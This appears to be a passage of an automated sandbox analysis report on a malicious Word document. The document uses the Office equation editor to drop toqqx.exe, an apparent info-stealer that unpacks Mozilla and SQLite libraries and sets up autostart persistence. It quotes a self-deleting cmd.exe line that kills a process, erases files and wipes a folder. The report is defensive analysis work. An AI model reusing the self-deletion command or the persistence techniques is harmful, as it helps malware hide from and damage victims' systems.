Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmp, toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0H
Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0I
Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0N
Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.thawte.com0
Source: toqqx.exe, 00000004.00000002.2240187063.0000000005B30000.00000002.00000001.sdmp, toqqx.exe, 00000008.00000002.2255199061.0000000005840000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: toqqx.exe, 00000004.00000002.2240187063.0000000005B30000.00000002.00000001.sdmp, toqqx.exe, 00000008.00000002.2255199061.0000000005840000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmp | String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: toqqx.exe, 0000000B.00000003.2241406880.0000000000990000.00000004.00000001.sdmp | String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp | String found in binary or memory: http://www.mozilla.com0
Source: toqqx.exe, 0000000B.00000003.2255569362.0000000000898000.00000004.00000001.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: toqqx.exe, 0000000B.00000003.2255569362.0000000000898000.00000004.00000001.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: toqqx.exe | String found in binary or memory: https://discord.com/
Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000002.2250455395.0000000000489000.00000004.00000020.sdmp, toqqx.exe, 0000000B.00000000.2231082620.000000000105A000.00000002.00020000.sdmp | String found in binary or memory: https://discord.com/2
Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000002.2250455395.0000000000489000.00000004.00000020.sdmp, toqqx.exe, 0000000B.00000000.2231082620.000000000105A000.00000002.00020000.sdmp | String found in binary or memory: https://discord.com/6
Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000002.2250455395.0000000000489000.00000004.00000020.sdmp, toqqx.exe, 0000000B.00000000.2231082620.000000000105A000.00000002.00020000.sdmp | String found in binary or memory: https://discord.com/:
Source: toqqx.exe, 0000000B.00000003.2255569362.0000000000898000.00000004.00000001.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: toqqx.exe, 0000000B.00000003.2255569362.0000000000898000.00000004.00000001.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: toqqx.exe, 0000000B.00000003.2255569362.0000000000898000.00000004.00000001.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: toqqx.exe, 0000000B.00000003.2255569362.0000000000898000.00000004.00000001.sdmp | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: toqqx.exe, 0000000B.00000003.2255569362.0000000000898000.00000004.00000001.sdmp | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmp, toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
Source: toqqx.exe, 0000000B.00000003.2255569362.0000000000898000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/favicon.ico
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWindow created: window name: CLIPBRDWNDCLASS

    System Summary:

    Office equation editor drops PE file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\toqqx.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Sugvt[1].exe
    Source: C:\Users\user\toqqx.exe | Memory allocated: 76E20000 page execute and read and write
    Source: C:\Users\user\toqqx.exe | Memory allocated: 76D20000 page execute and read and write
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Memory allocated: 76E20000 page execute and read and write
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Memory allocated: 76D20000 page execute and read and write
    Source: C:\Users\user\toqqx.exe | Code function: 4_2_00357050
    Source: C:\Users\user\toqqx.exe | Code function: 4_2_0035A2F0
    Source: C:\Users\user\toqqx.exe | Code function: 4_2_00358BAE
    Source: C:\Users\user\toqqx.exe | Code function: 4_2_00350C9C
    Source: C:\Users\user\toqqx.exe | Code function: 4_2_0035D518
    Source: C:\Users\user\toqqx.exe | Code function: 4_2_00351D78
    Source: C:\Users\user\toqqx.exe | Code function: 4_2_003555E0
    Source: C:\Users\user\toqqx.exe | Code function: 4_2_00355EB0
    Source: C:\Users\user\toqqx.exe | Code function: 4_2_00359F50
    Source: C:\Users\user\toqqx.exe | Code function: 4_2_003507C8
    Source: C:\Users\user\toqqx.exe | Code function: 4_2_0035A03C
    Source: C:\Users\user\toqqx.exe | Code function: 4_2_0035C038
    Source: C:\Users\user\toqqx.exe | Code function: 4_2_0035112B
    Source: C:\Users\user\toqqx.exe | Code function: 4_2_00355298
    Source: C:\Users\user\toqqx.exe | Code function: 4_2_00356DE8
    Source: C:\Users\user\toqqx.exe | Code function: 4_2_00351E2A
    Source: C:\Users\user\toqqx.exe | Code function: 8_2_003B7050
    Source: C:\Users\user\toqqx.exe | Code function: 8_2_003BA2F0
    Source: C:\Users\user\toqqx.exe | Code function: 8_2_003B8BAE
    Source: C:\Users\user\toqqx.exe | Code function: 8_2_003B0CA0
    Source: C:\Users\user\toqqx.exe | Code function: 8_2_003BD518
    Source: C:\Users\user\toqqx.exe | Code function: 8_2_003B1D78
    Source: C:\Users\user\toqqx.exe | Code function: 8_2_003B55E0
    Source: C:\Users\user\toqqx.exe | Code function: 8_2_003B5EB0
    Source: C:\Users\user\toqqx.exe | Code function: 8_2_003B9F50
    Source: C:\Users\user\toqqx.exe | Code function: 8_2_003B07C8
    Source: C:\Users\user\toqqx.exe | Code function: 8_2_003BC038
    Source: C:\Users\user\toqqx.exe | Code function: 8_2_003BA03C
    Source: C:\Users\user\toqqx.exe | Code function: 8_2_003BC02A
    Source: C:\Users\user\toqqx.exe | Code function: 8_2_003B112B
    Source: C:\Users\user\toqqx.exe | Code function: 8_2_003B5298
    Source: C:\Users\user\toqqx.exe | Code function: 8_2_003B6DE8
    Source: C:\Users\user\toqqx.exe | Code function: 8_2_003B1E2A
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_00413480
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_00413C90
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_00413060
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_00413AA0
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_00404B10
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 13_2_00413060
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 13_2_00413AA0
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 13_2_00404B10
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 13_2_00413480
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 13_2_00413C90
    Source: PL_503_13_570.docx | OLE indicator has summary info: false
    Source: PL_503_13_570.docx | OLE indicator application name: unknown
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: String function: 0040B166 appears 46 times
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: String function: 00408C20 appears 82 times
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: String function: 00422F70 appears 782 times
    Source: sqlite3.dll.11.dr | Static PE information: Number of sections : 19 > 10
    Source: Sugvt[1].exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: toqqx.exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: notpad.exe.4.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: toqqx.exe.4.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: notpad.exe.8.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winDOCX@18/32@0/2
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_00421CF0 InternetSetFilePointer,InternetReadFile,_memset,HttpQueryInfoA,CoCreateInstance,_memcpy_s,_memcpy_s,
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$_503_13_570.docx
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRC0DE.tmp
    Source: PL_503_13_570.docx | OLE document summary: title field not present or empty
    Source: C:\Windows\SysWOW64\cmd.exe | Console Write: ................................x.......(.P.....D.................................................'.....................Z.........B.......B.....
    Source: C:\Windows\SysWOW64\cmd.exe | Console Write: ......................B.........A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........04^.......4.t...........0...............x.'.....&.................B.....
    Source: C:\Windows\SysWOW64\cmd.exe | Console Write: ................................................................_Bas.......................s......'.....................X.................B.....
    Source: C:\Windows\SysWOW64\taskkill.exe | Console Write: ..................-..............3E.....(.P.....D...............(.........................................................................-.....
    Source: C:\Users\user\toqqx.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 2540)
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
    Source: C:\Users\user\toqqx.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | File read: C:\Windows\System32\drivers\etc\hosts
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp | Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp | Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
    Source: toqqx.exe, 0000000B.00000003.2248959479.0000000002FE0000.00000004.00000001.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
    Source: toqqx.exe, 0000000B.00000003.2248959479.0000000002FE0000.00000004.00000001.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
    Source: toqqx.exe, 0000000B.00000003.2236787988.0000000002BC0000.00000004.00000001.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
    Source: toqqx.exe, 0000000B.00000003.2236787988.0000000002BC0000.00000004.00000001.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp | Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
    Source: toqqx.exe, 0000000B.00000003.2248959479.0000000002FE0000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp | Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
    Source: toqqx.exe, 0000000B.00000003.2236787988.0000000002BC0000.00000004.00000001.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
    Source: toqqx.exe, 0000000B.00000003.2236787988.0000000002BC0000.00000004.00000001.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
    Source: toqqx.exe, 0000000B.00000003.2248959479.0000000002FE0000.00000004.00000001.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
    Source: toqqx.exe, 0000000B.00000003.2248959479.0000000002FE0000.00000004.00000001.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
    Source: toqqx.exe, 0000000B.00000003.2248959479.0000000002FE0000.00000004.00000001.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp | Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp | Binary or memory string: SELECT ALL id FROM %s;
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp | Binary or memory string: SELECT ALL id FROM %s WHERE %s;
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
    Source: toqqx.exe, 0000000B.00000003.2248959479.0000000002FE0000.00000004.00000001.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
    Source: toqqx.exe, 0000000B.00000003.2248959479.0000000002FE0000.00000004.00000001.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
    Source: toqqx.exe, 0000000B.00000003.2248959479.0000000002FE0000.00000004.00000001.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
    Source: toqqx.exe, 0000000B.00000003.2248959479.0000000002FE0000.00000004.00000001.sdmp | Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
    Source: toqqx.exe, 0000000B.00000003.2248959479.0000000002FE0000.00000004.00000001.sdmp | Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
    Source: PL_503_13_570.docx | Virustotal: Detection: 36%
    Source: PL_503_13_570.docx | ReversingLabs: Detection: 34%
    Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
    Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\toqqx.exe C:\Users\user\toqqx.exe
    Source: C:\Users\user\toqqx.exe | Process created: C:\Users\user\AppData\Local\Temp\toqqx.exe C:\Users\user\AppData\Local\Temp\toqqx.exe
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /pid 2540 & erase C:\Users\user\AppData\Local\Temp\toqqx.exe & RD /S /Q C:\\ProgramData\\843743064682002\\* & exit
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 2540
    Source: C:\Users\user\toqqx.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
    Source: Window Recorder | Window detected: More than 3 window changes detected
    Source: C:\Users\user\toqqx.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb | source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp
    Source: Binary string: vcruntime140.i386.pdb | source: toqqx.exe, 0000000B.00000003.2251913088.000000000097A000.00000004.00000001.sdmp
    Source: Binary string: vcruntime140.i386.pdbGCTL | source: toqqx.exe, 0000000B.00000003.2251913088.000000000097A000.00000004.00000001.sdmp
    Source: Binary string: msvcp140.i386.pdbGCTL | source: toqqx.exe, 0000000B.00000003.2242122953.0000000000A7D000.00000004.00000001.sdmp
    Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb | source: toqqx.exe, 0000000B.00000003.2241406880.0000000000990000.00000004.00000001.sdmp
    Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) | source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp
    Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! | source: toqqx.exe, 0000000B.00000003.2241406880.0000000000990000.00000004.00000001.sdmp
    Source: Binary string: msvcp140.i386.pdb | source: toqqx.exe, 0000000B.00000003.2242122953.0000000000A7D000.00000004.00000001.sdmp
    Source: PL_503_13_570.docx | Initial sample: OLE indicators vbamacros = False
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_0041C810 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
    Source: sqlite3.dll.11.dr | Static PE information: section name: /4
    Source: sqlite3.dll.11.dr | Static PE information: section name: /19
    Source: sqlite3.dll.11.dr | Static PE information: section name: /35
    Source: sqlite3.dll.11.dr | Static PE information: section name: /51
    Source: sqlite3.dll.11.dr | Static PE information: section name: /63
    Source: sqlite3.dll.11.dr | Static PE information: section name: /77
    Source: sqlite3.dll.11.dr | Static PE information: section name: /89
    Source: sqlite3.dll.11.dr | Static PE information: section name: /102
    Source: sqlite3.dll.11.dr | Static PE information: section name: /113
    Source: sqlite3.dll.11.dr | Static PE information: section name: /124
    Source: mozglue.dll.13.dr | Static PE information: section name: .didat
    Source: msvcp140.dll.13.dr | Static PE information: section name: .didat
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_00408C65 push ecx; ret
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 13_2_00408C65 push ecx; ret
    Source: initial sample | Static PE information: section name: .text entropy: 7.95918659067
    Source: C:\Users\user\toqqx.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notpad\notpad.exe
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | File created: C:\ProgramData\mozglue.dll
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | File created: C:\ProgramData\nss3.dll
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | File created: C:\ProgramData\sqlite3.dll
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\toqqx.exe
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | File created: C:\ProgramData\msvcp140.dll
    Source: C:\Users\user\toqqx.exe | File created: C:\Users\user\AppData\Local\Temp\toqqx.exe
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | File created: C:\ProgramData\freebl3.dll
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | File created: C:\ProgramData\vcruntime140.dll
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Sugvt[1].exe
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | File created: C:\ProgramData\softokn3.dll

    Boot Survival:

    Creates an undocumented autostart registry key
    Source: C:\Users\user\toqqx.exe | Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
    Drops PE files to the user root directory
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\toqqx.exe
    Source: C:\Users\user\toqqx.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notpad
    Source: C:\Users\user\toqqx.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notpad\notpad.exe
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_00419700 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
